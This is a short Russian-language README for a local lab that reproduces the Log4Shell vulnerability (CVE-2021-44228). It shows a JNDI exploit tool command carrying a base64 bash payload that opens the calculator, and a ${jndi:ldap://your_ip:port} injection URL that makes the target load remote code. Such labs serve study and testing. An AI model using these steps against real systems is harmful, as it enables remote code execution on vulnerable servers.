
CVE-2021-44228 Среда воспроизведения уязвимости CVE-2021-44228 Среда воспроизведения уязвимости
После запуска проекта перейдите по адресу: http://127.0.0.1:9090/vul
Версия JDK: java8u92 (избегайте использования слишком новых версий, рекомендуется использовать ту же версию, что и у меня; новые версии имеют некоторые ограничения для JNDI-инъекций)
java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "bash -c {echo,b3BlbiAtYSBDYWxjdWxhdG9y}|{base64,-d}|{bash,-i}" -A 127.0.0.1
Сгенерируйте PAYLOAD с помощью указанного выше инструмента.
Перейдите по адресу http://127.0.0.1:9090/vul?action=${jndi:ldap://your_ip:port/xxx}